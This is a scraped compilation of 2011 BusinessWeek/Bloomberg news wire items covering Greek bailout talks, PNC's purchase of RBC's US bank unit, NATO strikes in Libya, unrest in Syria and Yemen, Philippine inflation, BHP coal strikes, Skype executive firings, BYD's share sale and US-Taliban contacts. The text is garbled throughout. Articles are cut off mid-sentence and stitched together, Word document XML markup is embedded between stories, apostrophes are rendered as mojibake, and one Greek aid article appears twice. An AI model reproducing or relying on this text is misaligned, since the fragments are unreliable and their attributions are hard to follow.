with a fundamental consensus of the political parties so that we can be confident that Greece will live up to its commitments."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raised the prospects for a second aid package on June 17 by dropping calls for a mandatory bond exchange that might lead rating companies to declare Greece in default. Chancellor Angela Merkel's concession gave a lift to stocks, bonds and the euro, spurring optimism that Europe would get ahead of the debt crisis that has exposed the weaknesses of the 17-country currency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Germany bowed to European Central Bank and French demands not to compel investors to buy new Greek bonds as old ones expire, the lines are blurry between a "voluntary" and "compulsory" rollover that would lead rating companies to declare Greece in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table are incentives for bondholders to maintain their exposure to Greece, said Luxembourg Prime Minister Jean- Claude Juncker, chairman of the talks. He ruled out an agreement tonight on a new three-year package for Greece, pointing to July for a "final and overall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and Marcus Bensasson in Athens, and Stephanie Bodoni, Andrew Davis, Mark Deen, Rebecca Christie, Rainer Buergin and Anabela Reis in Luxembourg. Editors: James Hertling, Patrick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James G. Neuger in Luxembourg at jneuger@bloomberg.net; Jonathan Stearns in Luxembourg at jstearns2@bloomberg.net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City of London Online Payment Alternatives Eastern Europe Investments Business of Beer Royal Bank of Scotland (RBS)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http://www.businessweek.com/news/2011-06-19/europe-may-withhold-half-of-greek-payment-to-push-athens.html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PNC Financial Said to Pay $3.45 Billion for RBC U.S. Unit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5:26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FalconeБ─(tm)s LightSquared, Sprint Agree to 15-Year Network Accord Capital One to Buy INGБ─(tm)s Online U.S. Bank for $9 Billion RBC Said to Near Sale of U.S. Bank Unit to PNC Financial BofAБ─(tm)s Moynihan Says Capital Rules May Discourage Lending Capital OneБ─(tm)s Fairbank Ramps Up Б─≤Empire BuildingБ─(tm) With ING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Jeffrey McCracken, Douglas Alexander and Laura Marcinek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the details on PNC in the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PNC Financial Services Group Inc. may pay $3.45 billion in cash and stock for U.S. assets of Royal Bank of Canada, people with knowledge of the matter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could be announced as soon as tomorrow, said the people, who declined to be identified because the talks are private. PNC has retail operations in 15 states and the District of Columbia, including more than 2,500 branches, according to the bank's website. The firm acquired National City Corp. in 2009 for about $3.9 billion in stock.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deal would help Pittsburgh-based PNC expand its retail business in the U.S. Southeast beyond a foothold in Florida. The RBC Bank unit, based in Raleigh, North Carolina, has more than 420 branches concentrated in six states across the region. PNC Chief Executive Officer Jim Rohr, 62, told investors June 3 the bank is "disciplined" with acquisitions, preferring purchases that build 10 percent market share in "larger" cities.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Fred Solomon, a spokesman for PNC, said the bank doesn't comment on "rumors or speculation." Katherine Gay, a spokeswoman for RBC,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Peter Eichenbaum, Chris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Jeffrey McCracken in New York at jmccracken3@bloomberg.net; Doug Alexander in Toronto at dalexander3@bloomberg.net; Laura Marcinek in New York at lmarcinek3@bloomberg.net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David Scheer at dscheer@bloomberg.net; Jennifer Sondag at jsondag@bloomberg.net;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 S. Broadband Policy U.S. Competitiveness U.S. Retail Sales U.S. Stock Market U.S. Postal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http://www.businessweek.com/news/2011-06-19/pnc-financial-said-to-pay-3-45-billion-for-rbc-u-s-unit.html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NATO Acknowledges Possible Civilian Casualties in Tripoli Strike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5:25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NATO Probing Libyan Claims of Civilian Deaths in Tripoli Yemeni Clerics Seek SalehБ─(tm)s Removal, Elections in 60 Days QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Syrians Flee Second Northern Town as Army Said to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Holly Rosenkrantz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NATO warplanes didn't all hit intended targets in Tripoli and may have killed civilians, the alliance said in an e-mailed statement after Libyan Foreign Minister Abdul Ati Al-Obeidi said yesterday that a private house in Tripoli had been hit, causing several deaths.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Atlantic Treaty Organization said that, while the intended target was a military missile site, "it appears that one weapon did not strike the intended target" and may have caused "a number of civilian casualties," an e-mailed statement from NATO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regrets the loss of innocent civilian lives and takes great care in conducting strikes against a regime determined to use violence against its own citizens," said NATO commander Lieutenant General Charles Bouchard. The incident is still under investigation, he said in the NATO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missile strike destroyed a house in the Souk al- Gomaa residential area, killing nine civilians and wounding 18 others, Obeidi said. Four members of a Syrian family, including two children, died in the attack, Syrian state television reported. Eight rebels were killed and 36 injured in combat with troops loyal to Qaddafi west of Misrata yesterday, Al Jazeera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Opposition has been growing in the U.S. and Europe to the United Nations- mandated aerial campaign against Muammar Qaddafi's forces, which is intended to protect civilians. Four months after the uprising against Qaddafi began, rebel troops have failed to take and hold strategic towns such as Brega while other cities, such as the rebel-held port city of Misrata, remain under siege by loyalist forces.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Violence in the region has helped push up oil prices, with futures up 22 percent from a year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Weakening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Qaddafi's troops are beginning to weaken, according to Defense Secretary Robert Gates. The U.S. will continue to support the NATO-led mission in Libya until Qaddafi is removed from power, Gates said yesterday in interviews on CNN's "State of the Union" program and "Fox News Sunday."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allies are prepared to sustain this," Gates said on CNN. "Qaddafi will eventually fail."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Syria, President Bashar al-Assad will make a speech at noon local time today concerning the current situation in his country, state television reported without citing anyone.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the Syrian ruler began in mid-March, part of demonstrations across the Middle East and North Africa this year that have unseated the leaders of Egypt and Tunisia.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Unrelenting Crackdown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 advised all British nationals to leave Syria immediately over the weekend amid an unrelenting government crackdown on pro-democracy protesters that has killed more than 1,200 people, according to the Syrian Observatory for Human Rights.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head of the International Committee of the Red Cross is scheduled to arrive in Damascus today to discuss measures to aid Syrian refugees, Al Jazeera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 is going through an era of unrest, but the Obama administration won't be able to blackmail Syria," Syrian Ambassador to the U.S. Emad Mustafa told Al-Khaleej newspaper. "It's a golden opportunity for Washington to blackmail Syria in an attempt to get concessions."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Syrian government distinguishes between the peaceful protesters and the armed groups and Assad "will address all these things in his speech tomorrow,"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Turkish Border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troops combing through villages near the Turkish border set fire to homes and a bakery yesterday, according to the AP. Activists said the military carried out mass arrests and threw up checkpoints to block residents from fleeing.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Ersat Hurmuzlu, senior adviser to Turkish President Addullah Gul, told Al- Arabiya that Turkey would welcome Maher Al-Assad, brother of the Syrian president, in Turkey if that would help solve the crisis in Syria.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looking forward to Assad's speech tomorrow,"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Yemeni religious clerics have called for President Ali Abdullah Saleh's ouster, joining demands from protesters that the embattled leader to step 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clerics urged Vice President Abed Rabbo Mansur Hadi to establish a caretaker government to run the country and prepare for presidential elections in 60 days, according to a statement e-mailed June 18 and signed by 110 clerics.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Zaid Sabah Abd Alhamid in Washington and Maher Chmaytelli in Tripoli.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Holly Rosenkrantz in Washington at hrosenkrantz@bloomberg.net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Religion in the Workplace Social Media in the Workplace United Technologies Investing in Technology Investing in Commodities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http://www.businessweek.com/news/2011-06-19/nato-acknowledges-possible-civilian-casualties-in-tripoli-strike.html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Spain's Salgado Says Next Greek Aid Payment Can't Be Divided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5:57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Europe May Withhold Half of Greek Payment to Push Athens Euro Finance Chiefs Unlikely to Reach Greek Aid Plan Today Reynders Raises Prospect of Deal on EU6 Billion Greek Payment ECBБ─(tm)s Trichet Says Widening Imbalances Challenge Policy Makers New Portugal Premier Coelho Picks Gaspar as Finance Minister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Anabela Reis and Andrew Davis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Spanish Economy Minister Elena Salgado said euro area finance ministers are discussing a 12 billion-euro ($17.1 billion) aid payment to Greece after her Belgian counterpart, Didier Reynders, said the group may authorize only half that amount.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way the money is distributed has to do with Greece's specific refinancing needs," Salgado told reporters as the finance chiefs met in Luxembourg late today. "You can't divide it. The fifth payment is 12 billion euros." No one at today's meeting proposed authorizing a 6 billion- euro payment,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Salgado said the 6 billion-euro figure refers to Greece's refinancing needs in August. "But that's not what they're asking for," she said. "Greece needs money not only to refinance its debt but also its budget. The 6 billion are included in the 12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Spanish minister said private investors don't need incentives to participate in a new rescue package for Greece. "The idea of many countries is that the private sector has to assume its share of the problems that Greece has at this moment."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Patrick G.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Anabela Reis in Luxembourg at areis1@bloomberg.net; Andrew Davis in Luxembourg at abdavis@bloomberg.net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Angela Cullen at acullen8@bloomberg.net; Tim Quinson at tquinson@bloomberg.net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Social Security Online Payment Alternatives Online Video European Financial Crisis Digital Privacy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01:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/spain-s-salgado-says-next-greek-aid-payment-can-t-be-divided.html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Philippines Still Faces Inflation Risks, Tetangco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4:14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Inflation Risks Continue to Challenge Philippines, Tetangco Says China Existing Home Market Cools in May Amid Government Curbs Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says India Signals Slower Pace of Rate Increases on Global Risks Cebu Air, Energi, Honam, Merge: Asia Ex-Japan Stock Preview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Joel Guinto and Cecilia Yap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analyst comment in seventh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The Philippines still faces risks from inflation and the central bank is closely watching inflows and liquidity levels, Governor Amando Tetangco said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still risks that can affect inflation, but right now we would like to first assess the impact of the measures we have adopted," Tetangco told reporters in Laguna province, south of Manila. The inflation target of 3 percent to 5 percent in 2011 is "still at risk," prompting policymakers to raise banks' reserve requirement ratio this month,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 Sentral ng Pilipinas on June 16 ordered lenders to set aside more money as reserves while keeping its overnight rate unchanged at 4.5 percent, after raising the benchmark by a combined half a percentage point in its two previous meetings. Higher food and oil prices have prompted policymakers in Asia to increase borrowing costs and their currencies to gain to combat inflation even amid prospects of slowing global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bank's recent actions are "part of the normalization of monetary policy," Tetangco said. "The question is, whether there is going to be a need for further action moving forward."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 Sentral cut banks' reserve requirement ratio by 2 percentage points to 19 percent in November 2008 and a month later started cutting the benchmark rate to help spur growth amid a global slowdown. That easing cycle reduced the overnight rate by a total of 200 basis points.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Starting June 24, the reserve ratio will rise to 20 percent, the central bank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Dependent'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 further rate increase will be data dependent," said Jonathan Ravelas, chief strategist at Banco de Oro Unibank Inc. in Manila, the nation's largest lender. "Raising the reserve ratio has an immediate effect of siphoning liquidity," said Ravelas, who predicts another quarter of a percentage point increase in the third quarter.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Bangko Sentral is monitoring oil and food prices and will "keep an eye on liquidity." A easing of monetary policy in the U.S. may boost inflows to emerging markets like the Philippines,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Money-supply rose 7.3 percent in April from a year earlier, the slowest pace in more than two years. That reflected the drop in public sector spending during the period, Tetangco said. The government will "jack up" spending in the second half, Budget Secretary Butch Abad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Increase Spending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of the government is to increase spending, so we'll see how that's going to affect liquidity," Tetangco said today. "The U.S. may decide to keep easy monetary policy longer, in which case that may lead to an increase in inflow of capital to the emerging markets. We need to watch that also,"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prices in the Philippines climbed 4.5 percent last month from year earlier, the biggest increase since April 2010. The $161 billion Asian economy expanded 4.9 percent last quarter, the smallest gain since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central bank forecasts show a lower inflation path and that expectations have shown some signs of leveling off, the central bank said on June 16.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Clarissa Batino in Manila. Editors: Paul Tighe, Richard Dobson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Cecilia Yap in Manila at cyap19@bloomberg.net; Clarissa Batino in Manila at cbatino@bloomberg.net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Need Innovation? Hire an Entrepreneur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Inflation Online Video Risk Management Global Climate Change General Motors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00:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/philippines-still-faces-inflation-risks-tetangco-says.html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BHP Australia Coal Miners Say Further Stoppages Hinge on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4:15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BHP Australia Coal Miners End Stoppages Ahead of Company Talks BHP Australia Coal Miners Hold Third Strike Before Talks Start AustraliaБ─(tm)s Swan Says Economy Buoyed by China, India Outlook Rare Earth Prices Double on China, Industrial Minerals Says Asia Housing Boom Stalls as Tightening Puts Brake on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Tracy Withers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Workers at BHP Billiton Ltd. coking coal mines in Australia say talks starting today will determine the likelihood of stoppages that may disrupt production from the world's largest exporter of the steelmaking commodity.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Labor union representatives for about 3,500 workers at seven mines owned by BHP Billiton Mitsubishi Alliance in Queensland's Bowen Basin meet management over the next two days to negotiate a new enterprise agreement. Workers have taken part in six-hour rolling stoppages in the past week as they attended meetings ahead of the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company and union officials don't make progress in the talks, the workers "want us to come back and give them an update on all the reasons why and then they'll take it from there," Stephen Smyth, president of the Construction, Forestry, Mining and Energy Union's mining and energy division in Queensland, said by telephone yesterday. "If here's any further action required the membership will make that decision."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of further, protracted strikes may boost coking coal prices already driven higher by supply shortages following floods in the state, Natalie Robertson, resources analyst at Australia &amp; New Zealand Banking Group Ltd. has said. BHP reported a 14 percent decline in production last quarter after rains from November to January inundated mines in Queensland, Australia's biggest exporter of the commodity.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CFMEU, the Australian Manufacturing Workers Union and the Communications, Electrical and Plumbing Union are seeking a new agreement with BMA for better wages and conditions, as well as addressing concerns about job security and recruitment, according to the union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union, which is required to give three full working days notice of any further action, still wants to negotiate, said Smyth.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"Hopefully, this week will be a lot more positive than it has been,"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Labor unions in Australia are stepping up demands for wage rises and job security after rising commodity prices swelled profits at mining companies including Melbourne-based BHP. Steelmaking coal prices rose 47 percent to a record $330 a metric ton for three-month contracts starting April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Stoppages took place across three days, commencing at the Saraji and Norwich Park mines on June 14, then the Gregory, Crinum and Blackwater mines on June 15 and the Goonyella Riverside and Peak Downs mines June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"BMA is strongly of the view that taking industrial action is premature given discussions are still progressing," BHP said in an e-mailed statement on June 13. The company has nothing to add to that statement, spokeswoman Kelly Quirke said by telephone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Demand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all the coal mined at the BMA mines, with annual capacity of 58 million metric tons, is shipped overseas for steel production, BMA said on its website. BMA is equally owned by BHP and Mitsubishi Development Pty. It directly employs more than 4,800 people, the website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imports of coking coal are forecast to gain at an average rate of 9 percent a year to reach 73 million tons in 2016, according to Australian government forecasts. India may triple coking coal imports within five years to meet surging demand from steelmakers, ANZ said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Exports of coking coal from Australia are forecast to rise 3 percent this year even after the floods, according to government forecasts. They may total 163 million tons this year compared with 159 million tons last year, the Australian Bureau of Agricultural &amp; Resource Economics and Sciences said in a March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Soraya Permatasari in Melbourne. Editors: Paul Tighe, Malcolm Scott.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Tracy Withers in Wellington at twithers@bloomberg.net.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Need Innovation? Hire an Entrepreneur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Coal Energy Coal Futures Data Mining Aircraft Manufacturers Futures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2011.06.20 00:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/bhp-australia-coal-miners-say-further-stoppages-hinge-on-talks.html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Skype Fires Executives, Avoiding Payouts After Microsoft Buyout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3:34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GoogleБ─(tm)s Admeld Purchase Slated for Justice Department Review RIM Investor Jarislowsky Joins Demands for Chairman-CEO Split FalconeБ─(tm)s LightSquared, Sprint Agree to 15-Year Network Accord MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News AngieБ─(tm)s List Is Said to Pick BofA to Handle Planned August IPO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Galante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Skype Technologies SA, the Internet- calling service being bought by Microsoft Corp., is firing senior executives before the deal closes, a move that reduces the value of their payout, according to three people familiar with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Vice Presidents David Gurle, Christopher Dean, Russ Shaw and Don Albert were dismissed from the Luxembourg-based company, said the people, who requested anonymity because the departures aren't public. Chief Marketing Officer Doug Bewsher and Anne Gillespie, head of human resources, were also fired. Executives Ramu Sunkara and Allyson Campa, from the 2011 Qik purchase, were also let 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timing of the dismissals means stock options will be worth less than if the executives stayed until the closing of the $8.5 billion deal, the people said. When a company gets bought, compensation is often tied to the purchase price, said Neil Sims, a managing director at Boyden, a search firm.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is good if you're staying with that transition team or you're packaged out," said Sims, who is based in San Francisco. "But if you're eliminated unceremoniously, without a package and without some negotiation, you could certainly lose unvested options."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Silver Lake, based in Menlo Park, California, led a $2 billion buyout of a 70 percent stake in Skype from EBay Inc. in 2009. The private equity firm and several Skype directors have actively voiced their opinions on who should be fired, two of the people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Jenny Farrelly, a spokeswoman for Silver Lake, and Frank Shaw, a spokesman for Microsoft,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‘Management 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"Skype, like any other pragmatic organization, constantly assesses its team structure to deliver its users the best products," said Brian O'Shaughnessy, a Skype spokesman. "As part of a recent internal shift, Skype has made some management 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Silver Lake hired Chief Executive Officer Tony Bates from Cisco Systems Inc. to replace Josh Silverman last year. Bates has put his stamp on Skype by trying to restore its engineering- centric roots, churning out more features at a faster pace for its 170 million active users. He also streamlined a global management structure that was decentralized and fraught with territorial disputes and slow bureaucracy. The company was headed for an initial public offering before Microsoft agreed to buy it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bought Skype with plans to connect it to Outlook e-mail, Xbox game console, Windows mobile phones and corporate- phone software. Skype offers voice and video calling over the Internet and is primarily used by consumers.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Gurle joined Skype in January 2010, overseeing its efforts to persuade corporations to adopt Skype. Dean served under Silverman as chief strategy officer, helping forge a partnership with Facebook Inc. Albert oversaw advertising endeavors including a partnership with The Oprah Winfrey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Six of the departures were previously reported by Skype Journal, a blog that covers the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Skype was founded in 2003 by Niklas Zennstrom and Janus Friis. The founders sold the company for $2.6 billion in 2005 to San Jose, California-based EBay.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Lisa Rapaport, Tom Giles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Joseph Galante in San Francisco at jgalante3@bloomberg.net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Tom Giles at tgiles5@bloomberg.net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Need Innovation? Hire an Entrepreneur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Microsoft Skype Microsoft Bing Executive Compensation Executive Job Search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23:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/skype-fires-executives-avoiding-payouts-after-microsoft-buyout.html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Buffett-Backed BYD to Raise $219 Million in China Share Sale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3:33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Existing Home Market Cools in May Amid Government Curbs China Stocks Fall, Capping Second Weekly Loss, on Policy Concern Prada IPO Said to Raise $2.14 Billion as Shares Sold at Low End Consumer Spending Fades in China Economy After Б─≤Peak DaysБ─(tm) China Sovereign Wealth Fund May Name New Co-Head, Executives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BYD Co., the Chinese carmaker backed by Warren Buffett, said it will raise 1.42 billion yuan ($219 million) in its Shenzhen, China share sale, less than the company originally sought.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BYD will sell 79 million shares at 18 yuan apiece, the company said in a statement to the Shenzhen exchange yesterday. The automaker had planned to raise as much as 2.19 billion yuan, according to the statement. BYD listed in Hong Kong in 2002.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Shenzhen-based BYD is tapping the mainland stock market to raise funds for expansion even as the CSI 300 Index, tracking stocks on the Shanghai and Shenzhen exchanges, has tumbled 14 percent from its April high on concern economic growth is slowing. The timing of the share sale wasn't "good", Stella Li, senior vice president, said before the announcement.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authorities approved our share sale, we had to go public within two months," Li said in an interview on June 17. "We'd rather list our shares next year, but it's out of our control."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Hong Kong shares of the company have tumbled 48 percent this year, compared with a 5.8 percent decline in the Hang Seng Index. The stock fell 1.2 percent to HK$21.40 on June 17.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BYD's share-sale experience isn't unique. Prada SpA, the Milan-based luxury company, raised $2.14 billion by selling shares near the low end of its target in this year's biggest Hong Kong initial public offering, according to people familiar with the matter on June 17. Samsonite International SA, the luggage maker, fell 7.2 percent in the first two days of trading on June 16 and 17 after its Hong Kong debut amid a global stock market slump and concern China's economy may cool.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 Decline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BYD's sales fell for 10 straight months through May amid slowing vehicle demand growth and rising competition as carmakers such as General Motors Co. and Nissan Motor Co. introduce cheaper models. China's passenger-car sales fell for the first time in more than two years in May after the government ended tax incentives and subsidies.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 good plan for our future, we feel that this is really priced too low," Li said. "We know our plan and we know our profitability in the next two to three years. We know we are going to do great and exciting things."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MidAmerican Energy Holdings Co., a unit of Buffett's Berkshire Hathaway Inc., bought 9.9 percent of BYD in September 2008. The carmaker raised HK$1.4 billion ($180 million) in an initial public offering in Hong Kong in July 2002 by selling shares at HK$10.95 each.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BYD will issue the new shares on June 21, and receive 1.35 billion yuan in net proceeds after deducting issuance fees, it said. The final share price was determined by factors including investor offers, the current industry situation, and valuations of comparable companies, the company said in a separate announcement to the Hong Kong stock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carmaker said on May 5 it planned to use 1.14 billion yuan of the proceeds from the share sale for automobile research, development and production facilities in Shenzhen. The company would also spend 652 million yuan to expand its auto product and accessories unit and 400 million yuan on a lithium- ion battery production project, BYD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--Yang Huiwen, Tian Ying, Liza Lin. Editors: Richard Frost, Dick Schumacher.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Liza Lin in Shanghai at llin15@bloomberg.net; Bloomberg News in Shanghai at hyang66@bloomberg.net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Kae Inoue at kinoue@bloomberg.net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Need Innovation? Hire an Entrepreneur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China Real Estate China Biotechnology Sales Operation Management U.S. Retail Sales Advertising in a Recession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23:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/buffett-backed-byd-to-raise-219-million-in-china-share-sale.html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Europe May Withhold Half of Greek Payment to Push Athens on Cuts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2:12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Papandreou Pleads for Greek Unity Before Vote of Confidence EU Officials to Discuss Greek Plan That Skirts Default Risk EU Ministers Set to Clear Way for Greek Payment, Germany Says Merkel, Sarkozy Endorse Б─≤ViennaБ─(tm)-Style Rollover of Greek Debt Papandreou Greek Б─≤OdysseyБ─(tm) Challenged by Confidence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G. Neuger and Jonathan Stearns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European governments weighed withholding half of Greece's next 12 billion-euro ($17.2 billion) aid payment, seeking to keep the country solvent while maintaining pressure on the government to slash the debt that pitched the euro area into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Euro-area finance ministers may authorize only a 6 billion- euro loan to tide Greece through bond redemptions in July, while further aid hinges on Greek budget cuts, Belgian Finance Minister Didier Reynders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in any case try to release the necessary funds for the short term," Reynders told reporters before a meeting of euro-area finance ministers in Luxembourg tonight.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financial brinksmanship ran in parallel with Greek Prime Minister George Papandreou's effort to save his government from collapse and win parliamentary backing for spending cuts, tax increases and state-asset sales needed to keep bailout funds flowing.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Tonight's euro-area finance ministers' meeting coincided with the start of a three-day Greek parliamentary debate in Athens over a confidence vote in a new cabinet at what Papandreou called a "critical crossroads." Papandreou has 155 seats in the 300-seat parliament.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said he planned to hold a referendum later in the year for changes to the constitution that would reform the political system in the country. The prime minister said his goal was to tackle the root causes of the country's debt and deficits that are "symptoms of the illness, not the cause."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Commitment'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Greek finance minister, Evangelos Venizelos, who was named in a cabinet overhaul two days ago, came to Luxembourg with a "strong commitment" to the planned 78 billion euros in budget cuts that provoked street protests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 achieve our target thanks to the efforts of our people and thanks to the cooperation and the assistance of our partners," Venizelos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47 percent of 1,208 Greeks surveyed by Kapa Research SA for To Vima newspaper oppose the wage and spending cuts and higher taxes, and want early elections. Almost 35 percent said the package should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which as Europe's largest economy is the biggest guarantor of aid packages to Greece, Ireland and Portugal, insists on an "ambitious" economic overhaul in Athens, Finance Minister Wolfgang Schaeuble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‘Fundamental Consensus'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surely work on laying the groundwork for paying out the tranche," Schaeuble said. "It also depends on Greece making the necessary decisions with a fundamental consensus of the political parties so that we can be confident that Greece will live up to its commitments."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raised the prospects for a second aid package on June 17 by dropping calls for a mandatory bond exchange that might lead rating companies to declare Greece in default. Chancellor Angela Merkel's concession gave a lift to stocks, bonds and the euro, spurring optimism that Europe would get ahead of the debt crisis that has exposed the weaknesses of the 17-country currency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Germany bowed to European Central Bank and French demands not to compel investors to buy new Greek bonds as old ones expire, the lines are blurry between a "voluntary" and "compulsory" rollover that would lead rating companies to declare Greece in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table are incentives for bondholders to maintain their exposure to Greece, said Luxembourg Prime Minister Jean- Claude Juncker, chairman of the talks. He ruled out an agreement tonight on a new three-year package for Greece, pointing to July for a "final and overall answer."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and Marcus Bensasson in Athens, and Stephanie Bodoni, Mark Deen, Rebecca Christie, Rainer Buergin and Anabela Reis in Luxembourg. Editors: James Hertling, Patrick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James G. Neuger in Luxembourg at jneuger@bloomberg.net; Jonathan Stearns in Luxembourg at jstearns2@bloomberg.net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Royal Bank of Scotland (RBS) Business of Law City of London Online Payment Alternatives Future of BRIC Nations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22:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/europe-may-withhold-half-of-greek-payment-to-push-athens-on-cuts.html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Reynders Raises Prospect of Deal on EU6 Billion Greek Payment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1:32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Finance Chiefs Unlikely to Reach Greek Aid Plan Today EU Officials to Discuss Greek Plan That Skirts Default Risk Greek Notes Surge as Merkel Seeks Compromise With ECB on Loans EU Ministers Set to Clear Way for Greek Payment, Germany Says Papandreou Greek Б─≤OdysseyБ─(tm) Challenged by Confidence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Stephanie Bodoni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Belgian Finance Minister Didier Reynders raised the prospect of finance ministers reaching a deal on payment of only half of the 12 billion-euro next installment to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only saying that financing has to be released by the International Monetary Fund and the European Union," Reynders told reporters in Luxembourg today. "That's the short-term. We will in any case try to release the necessary funds for the short-term, which should happen with a financing of a bit less than 6 billion euros in the beginning of July.''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Stephanie Bodoni in Luxembourg at sbodoni@bloomberg.net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Jones Hayden at jhayden1@bloomberg.net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Online Payment Alternatives Business of Golf Saudi Arabia Business Nanotechnology Companies The Economy of Southeast Asia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21:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/reynders-raises-prospect-of-deal-on-eu6-billion-greek-payment.html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Finance Chiefs Unlikely to Reach Greek Aid Plan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1:49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Reynders Raises Prospect of Deal on EU6 Billion Greek Payment EU Officials to Discuss Greek Plan That Skirts Default Risk New Portugal Premier Coelho Picks Gaspar as Finance Minister Greek Notes Surge as Merkel Seeks Compromise With ECB on Loans EU Ministers Set to Clear Way for Greek Payment, Germany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Mark Deen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 from De Jager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Dutch Finance Minister Jan Kees de Jager said he doesn't think euro area finance ministers will agree on a new rescue package for Greece at talks in Luxembourg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the fifth tranche, which depends on the Greek implementation of austerity measures and the IMF assessment of that," De Jager said. "But the real discussion at the moment is about the possible second program and there lies the real discussion today. We are going to debate on that and that will be a very heavy debate."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 Jager said he sees no need to expand the European Financial Stability Facility.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 value of 750 billion euros is enough, so we should stick with it," he said. "Coming out of this crisis, the most important thing is more austerity measures, more economic reforms and of course if Greece will perform, will implement all those measures. Then we will be there, if also the private sector is participating."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Patrick G. Henry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Mark Deen in Luxembourg at markdeen@bloomberg.net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Craig Stirling at cstirling1@bloomberg.net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Infrastructure Financing Small Business Financing Behavioral Finance Corporate Finance Micro Finance in India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21:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/euro-finance-chiefs-unlikely-to-reach-greek-aid-plan-today.html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Confirms Taliban Talks as Karzai Sees Pakistan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1:42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Taliban-U.S. Talks Б─≤Very Preliminary,Б─(tm) Defense Chief Says Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas Lugar Gives Obama Б─≤at BestБ─(tm) Mediocre Grade for Foreign Policy Pentagon Starts Paring Troops in Afghan War as Drawdown Looms ZawahiriБ─(tm)s Appointment Shows Al-Qaeda Still a Threat, Gates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James Rupert and Eltaf Najafizada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Eikenberry comment in third, ninth paragraphs.)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The U.S. has made "very preliminary" contacts with Afghan Taliban guerrillas, Defense Secretary Robert Gates said, a day after Afghanistan's president said he is looking to Pakistan to mediate peace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Hamid Karzai's speech, and a reaction today from U.S. Ambassador Karl Eikenberry, illustrated again recent tensions between the U.S. and the Afghan leader whose government it is supporting.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Karzai criticized the U.S. as an occupying force pursuing its own interests, Eikenberry told students in the western city of Herat that "hurtful and inappropriate" comments by "some of your leaders" undermine support in the U.S. for its aid and military role in Afghanistan.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Karzai's speech shows that he "has lost hope over America's ability to either defeat the Taliban or bring them to some kind of agreement," said Waheed Mujda, a political analyst at the Kabul Center for Strategic Studies, an independent think tank in Kabul.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U.S. congressional leaders such as Senator Richard Lugar, the top Republican on the Senate Foreign Relations Committee, pressing President Barack Obama to withdraw a substantial number of troops next month at the start of a promised drawdown, "Karzai is seriously concerned that the U.S. is pulling out of the conflict and so he is leaning toward working with Pakistan instead on peace negotiations," Mujda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has vowed to end the U.S. combat role in Afghanistan by 2014, handing over security duties to Afghan forces that the U.S. is training and equipping.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Their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who has praised and criticized the international military force in Afghanistan, yesterday told a youth conference in Kabul that the U.S.-led troops "are here for their own national interests." Repeating his criticism of U.S. military tactics that have caused civilian casualties, he said foreign troops "put our lives under their feet and dishonor the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U.S. officials often decline to comment on Karzai's criticisms of the American presence, Eikenberry responded, without naming Karzai.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Americans who are serving in your country at great cost in terms of our lives and treasures, hear themselves compared with occupiers, told that they are only here to advance their own narrow interests and likened to the brutal enemies of the Afghan people, my people in turn are filled with confusion and they grow weary of our effort here," Eikenberry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Military Pressure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State Department officials and envoys from other countries have met Taliban representatives in recent weeks, "real reconciliation talks are not likely to be able to make any substantive headway until at least this winter," Gates said on CNN's "State of the Union" program. "I think that the Taliban have to feel themselves under military pressure, and begin to believe that they can't win before they're willing to have a serious conversation,"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all said all along that a political outcome is the way most of these wars end," Gates said on CNN. "The question is when and if they're ready to talk seriously about meeting the redlines that President Karzai, and that the coalition have laid down, including totally disavowing al-Qaeda."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Importance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disclosing the U.S.-Taliban talks, Karzai said yesterday his government isn't involved. While he described the U.S. initiative as positive, he cited neighboring Pakistan as the key interlocutor with the guerrillas. "Getting Pakistan's help in peace talks is very important for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military has backed the Afghan Taliban as a proxy force, according to analysts such as Pakistani author Ahmed Rashid and U.S. officials such as Admiral Mike Mullen, chairman of the Joint Chiefs of Staff. Karzai has criticized Pakistan's role in Afghanistan, saying it supports the Taliban in an effort to dominate his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Mujda and other analysts say it is unclear what political concessions 